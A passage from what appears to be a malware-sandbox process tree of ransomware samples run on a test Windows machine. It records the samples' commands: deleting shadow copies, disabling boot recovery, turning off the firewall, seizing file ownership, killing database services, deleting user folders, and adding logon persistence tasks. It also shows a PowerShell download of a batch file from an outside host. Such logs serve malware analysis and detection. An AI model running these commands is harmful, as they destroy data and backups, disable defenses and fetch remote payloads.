      - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula "store.db" -nobanner
        6⤵
        
        PID:14820
        
        C:\Users\Admin\AppData\Local\Temp\iuNyTyE764.exe
        
        iuNyTyE7.exe -accepteula "store.db" -nobanner
        7⤵
        
        PID:10028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
      4⤵
      PID:2872
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
        5⤵
        
        PID:9364
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
        5⤵
        Modifies file permissions
        
        PID:9736
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c iuNyTyE7.exe -accepteula "store.db" -nobanner
        5⤵
        
        PID:11404
      - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula "store.db" -nobanner
        6⤵
        
        PID:16304
    - - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula -c Run -y -p extract -nobanner
        5⤵
        
        PID:14268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\DDF.sys""
      4⤵
      PID:16448
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\DDF.sys" /E /G Admin:F /C
        5⤵
        
        PID:14320
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\DDF.sys"
        5⤵
        Modifies file permissions
        
        PID:6332
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c iuNyTyE7.exe -accepteula "DDF.sys" -nobanner
        5⤵
        
        PID:11672
      - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula "DDF.sys" -nobanner
        6⤵
        
        PID:12924
        
        C:\Users\Admin\AppData\Local\Temp\iuNyTyE764.exe
        
        iuNyTyE7.exe -accepteula "DDF.sys" -nobanner
        7⤵
        
        PID:4408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\Program Files\Windows Mail\wabmig.exe""
      4⤵
      PID:10004
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
        5⤵
        
        PID:11728
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
        5⤵
        Modifies file permissions
        
        PID:16884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c iuNyTyE7.exe -accepteula "wabmig.exe" -nobanner
        5⤵
        
        PID:10956
      - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula "wabmig.exe" -nobanner
        6⤵
        
        PID:15260
    - - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula -c Run -y -p extract -nobanner
        5⤵
        
        PID:5452
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
      4⤵
      PID:4068
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
        5⤵
        
        PID:5180
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
        5⤵
        Modifies file permissions
        
        PID:12860
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c iuNyTyE7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
        5⤵
        
        PID:7576
      - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
        6⤵
        
        PID:12672
    - - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula -c Run -y -p extract -nobanner
        5⤵
        
        PID:6532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
      4⤵
      PID:13864
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
        5⤵
        
        PID:8628
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
        5⤵
        Modifies file permissions
        
        PID:7880
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c iuNyTyE7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
        5⤵
        
        PID:9756
      - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
        6⤵
        
        PID:4100
    - - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula -c Run -y -p extract -nobanner
        5⤵
        
        PID:7424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui""
      4⤵
      PID:6536
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui" /E /G Admin:F /C
        5⤵
        
        PID:6564
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui"
        5⤵
        Modifies file permissions
        
        PID:6224
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c iuNyTyE7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
        5⤵
        
        PID:15340
      - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
        6⤵
        
        PID:7516
    - - C:\Users\Admin\Desktop\00395\iuNyTyE7.exe
        
        iuNyTyE7.exe -accepteula -c Run -y -p extract -nobanner
        5⤵
        
        PID:14164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
      4⤵
      PID:14888
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
        5⤵
        
        PID:1072
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
        5⤵
        Modifies file permissions
        
        PID:2472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
      4⤵
      PID:13840
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
        5⤵
        
        PID:14056
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Cryakl.gen-e298ac8c4975ff92788ee7049e39b047d0805c2513f7a5ca4b1e98f8b260b923.exe
    HEUR-Trojan-Ransom.Win32.Cryakl.gen-e298ac8c4975ff92788ee7049e39b047d0805c2513f7a5ca4b1e98f8b260b923.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:752
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-70402de980d7cb82134f16705b21b15a381e988604ee1a0408640869437132e5.exe
    HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-70402de980d7cb82134f16705b21b15a381e988604ee1a0408640869437132e5.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3472
  - - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-70402de980d7cb82134f16705b21b15a381e988604ee1a0408640869437132e5.exe
      "C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-70402de980d7cb82134f16705b21b15a381e988604ee1a0408640869437132e5.exe"
      4⤵
      PID:16924
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:9832
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:16160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes"
        5⤵
        
        PID:16936
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:8436
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe ""
        5⤵
        
        PID:14160
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Cryptor.gen-6ed577361d0db8b085c54efef19fec4055ecdaaaf65b7ec63134275d93d6f09b.exe
    HEUR-Trojan-Ransom.Win32.Cryptor.gen-6ed577361d0db8b085c54efef19fec4055ecdaaaf65b7ec63134275d93d6f09b.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2712
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete
      4⤵
      PID:8144
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete
        5⤵
        
        PID:8012
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Encoder.gen-87023bcd5a3fd1b751c150b272ec9a2d1448de60710cc2c6d975b6dcef765881.exe
    HEUR-Trojan-Ransom.Win32.Encoder.gen-87023bcd5a3fd1b751c150b272ec9a2d1448de60710cc2c6d975b6dcef765881.exe
    3⤵
    - Executes dropped EXE
    PID:3496
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Foreign.vho-6ef4aa9ec54235327b67e5ecd91508db638318e572dd2e61a20c5b12b713267c.exe
    HEUR-Trojan-Ransom.Win32.Foreign.vho-6ef4aa9ec54235327b67e5ecd91508db638318e572dd2e61a20c5b12b713267c.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3360
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Gen.gen-5dbfdec02487b7925e5b390c9d3141b051149364b755a8a2da406673a0c9f91f.exe
    HEUR-Trojan-Ransom.Win32.Gen.gen-5dbfdec02487b7925e5b390c9d3141b051149364b755a8a2da406673a0c9f91f.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4064
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Generic-05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe
    HEUR-Trojan-Ransom.Win32.Generic-05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe
    3⤵
    - Executes dropped EXE
    PID:4868
  - - C:\Windows\system32\cmd.exe
      cmd /C "label F: Encrypted"
      4⤵
      PID:8984
    - - C:\Windows\system32\label.exe
        
        label F: Encrypted
        5⤵
        
        PID:8732
  - - C:\Windows\system32\cmd.exe
      cmd /C "label C: Encrypted"
      4⤵
      PID:7904
    - - C:\Windows\system32\label.exe
        
        label C: Encrypted
        5⤵
        
        PID:8372
  - - C:\Windows\system32\cmd.exe
      cmd /C "reg add HKEY_CLASSES_ROOT\.secure\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,271 /f"
      4⤵
      PID:7356
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CLASSES_ROOT\.secure\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,271 /f
        5⤵
        
        PID:5400
  - - C:\Windows\system32\cmd.exe
      cmd /C "taskkill /F /IM sqlservr.exe /T"
      4⤵
      PID:9816
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlservr.exe /T
        5⤵
        Kills process with taskkill
        
        PID:7704
  - - C:\Windows\system32\cmd.exe
      cmd /C "taskkill /F /IM sqlceip.exe /T"
      4⤵
      PID:6868
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlceip.exe /T
        5⤵
        Kills process with taskkill
        
        PID:15536
  - - C:\Windows\system32\cmd.exe
      cmd /C "taskkill /F /IM sqlwriter.exe /T"
      4⤵
      PID:7056
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlwriter.exe /T
        5⤵
        Kills process with taskkill
        
        PID:5036
  - - C:\Windows\system32\cmd.exe
      cmd /C "rmdir C:\Users\Admin\AppData /s /q"
      4⤵
      PID:15784
  - - C:\Windows\system32\cmd.exe
      cmd /C "rmdir C:\Users\Default\AppData /s /q"
      4⤵
      PID:11636
  - - C:\Windows\system32\cmd.exe
      cmd /C "rmdir C:\Users\Public\AppData /s /q"
      4⤵
      PID:7600
  - - C:\Windows\system32\cmd.exe
      cmd /C "attrib +h +s Crypto.exe"
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:3132
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s Crypto.exe
        5⤵
        Views/modifies file attributes
        
        PID:10128
  - - C:\Windows\system32\cmd.exe
      cmd /C "net stop MSSQL$SQLEXPRESS"
      4⤵
      PID:17260
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$SQLEXPRESS
        5⤵
        
        PID:11744
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
        6⤵
        
        PID:8180
  - - C:\Windows\system32\cmd.exe
      cmd /C "rmdir F:\$Recycle.Bin /s /q"
      4⤵
      PID:10540
  - - C:\Windows\system32\cmd.exe
      cmd /C "rmdir C:\$Recycle.Bin /s /q"
      4⤵
      PID:13124
  - - C:\Windows\system32\cmd.exe
      cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/clear.txt', 'C:\Users\Public\Music\clear.bat')"
      4⤵
      PID:9448
    - - C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
        
        C:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/clear.txt', 'C:\Users\Public\Music\clear.bat')
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12652
  - - C:\Windows\system32\cmd.exe
      cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/video.mp4', 'C:\Users\Public\Music\video.mp4')"
      4⤵
      PID:6324
    - - C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
        
        C:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/video.mp4', 'C:\Users\Public\Music\video.mp4')
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6288
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Shade.gen-1f58f9afa91db98e0d7d13ad5d42205f64714281b12e608820d222e95af22881.exe
    HEUR-Trojan-Ransom.Win32.Shade.gen-1f58f9afa91db98e0d7d13ad5d42205f64714281b12e608820d222e95af22881.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4736
- - C:\Users\Admin\Desktop\00395\Trojan-Ransom.MSIL.Xcrypto.d-20ff3ee05f1dffc81e04f2917f8e47d569c3c0b41145e1a8f95ab8c69d5259d3.exe
    Trojan-Ransom.MSIL.Xcrypto.d-20ff3ee05f1dffc81e04f2917f8e47d569c3c0b41145e1a8f95ab8c69d5259d3.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:512
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      4⤵
      PID:6260
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C vssadmin Delete Shadows /All /Quiet
      4⤵
      PID:7988
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:7432
  - - C:\Windows\SYSTEM32\netsh.exe
      "netsh.exe" Advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:9996
  - - C:\Windows\SYSTEM32\netsh.exe
      "netsh.exe" Advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:8692
- - C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Blocker.lckf-a66091d7ea74ec75541e89e299e55a585aec31e153ef4b367dec10babb76c5bc.exe
    Trojan-Ransom.Win32.Blocker.lckf-a66091d7ea74ec75541e89e299e55a585aec31e153ef4b367dec10babb76c5bc.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2576
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      PID:9052
- - C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Crusis.to-3e7f30a802c595379ad3158ffe4ba5bc9e4a4d304430a2d846330adee70dc9a5.exe
    Trojan-Ransom.Win32.Crusis.to-3e7f30a802c595379ad3158ffe4ba5bc9e4a4d304430a2d846330adee70dc9a5.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:392
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:916
    - - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        5⤵
        
        PID:8232
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:6828
- - C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Cryptoff.ad-5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4.exe
    Trojan-Ransom.Win32.Cryptoff.ad-5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4876
  - - C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Cryptoff.ad-5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4.exe
      "C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Cryptoff.ad-5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4.exe"
      4⤵
      PID:4392
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet"
        5⤵
        
        PID:9124
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no"
        5⤵
        
        PID:9088
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
        5⤵
        
        PID:8296
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Cryptoff.ad-5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4.exe.bat" "
        5⤵
        
        PID:10188
- - C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Cryptor.dri-64dd179bab62fb8b024a477e6d3b037895d2da1c3bd53c99d251960527203d9c.exe
    Trojan-Ransom.Win32.Cryptor.dri-64dd179bab62fb8b024a477e6d3b037895d2da1c3bd53c99d251960527203d9c.exe
    3⤵
    - Executes dropped EXE
    PID:1532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 1192
      4⤵
      Program crash
      PID:6980
- - C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Encoder.kis-db157f4e2d83d24ebe29edc7557773b031f62371a12238fb1b523f0c14e65f85.exe
    Trojan-Ransom.Win32.Encoder.kis-db157f4e2d83d24ebe29edc7557773b031f62371a12238fb1b523f0c14e65f85.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4216
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C6D7.tmp\C6E7.tmp\C8AD.bat C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Encoder.kis-db157f4e2d83d24ebe29edc7557773b031f62371a12238fb1b523f0c14e65f85.exe"
      4⤵
      PID:6948
- - C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Gen.yqb-eb0605f0de19d71d0e95bb1e41967823f9c06d399a58a75a18a0c587a3e70f76.exe
    Trojan-Ransom.Win32.Gen.yqb-eb0605f0de19d71d0e95bb1e41967823f9c06d399a58a75a18a0c587a3e70f76.exe
    3⤵
    PID:1080
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "wmiintegrator" /sc ONLOGON /tr "'C:\PerfLogs\wmiintegrator.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6728
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Users\All Users\USOShared\Logs\User\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9504
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\PerfLogs\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7284
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\INT\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5124
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\squid\share\icons\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6216
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\squid\system32\csrss.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7456
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5648
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\PerfLogs\conhost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3484
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Trojan-Ransom.Win32.Crusis.to-3e7f30a802c595379ad3158ffe4ba5bc9e4a4d304430a2d846330adee70dc9a5" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Trojan-Ransom.Win32.Crusis.to-3e7f30a802c595379ad3158ffe4ba5bc9e4a4d304430a2d846330adee70dc9a5.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6920
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\sihost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4224
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "HEUR-Trojan-Ransom.Win32.Encoder.gen-87023bcd5a3fd1b751c150b272ec9a2d1448de60710cc2c6d975b6dcef765881" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\HEUR-Trojan-Ransom.Win32.Encoder.gen-87023bcd5a3fd1b751c150b272ec9a2d1448de60710cc2c6d975b6dcef765881.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5096
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\cmd.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7288
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Windows\apppatch\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1288
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "HEUR-Trojan-Ransom.Win32.Gen.gen-5dbfdec02487b7925e5b390c9d3141b051149364b755a8a2da406673a0c9f91f" /sc ONLOGON /tr "'C:\ProgramData\Application Data\HEUR-Trojan-Ransom.Win32.Gen.gen-5dbfdec02487b7925e5b390c9d3141b051149364b755a8a2da406673a0c9f91f.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5708
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\squid\var\logs\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:8688
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "wmisecure" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\de-DE\wmisecure.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7860
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7464
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "WMIC" /sc ONLOGON /tr "'C:\PerfLogs\WMIC.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6360
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:10044
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\sppsvc.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:10596
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\squid\docs\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:15204
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:224
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5688
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Program Files\Crashpad\attachments\svchost.exe'" /rl HIGHEST /f
      4⤵
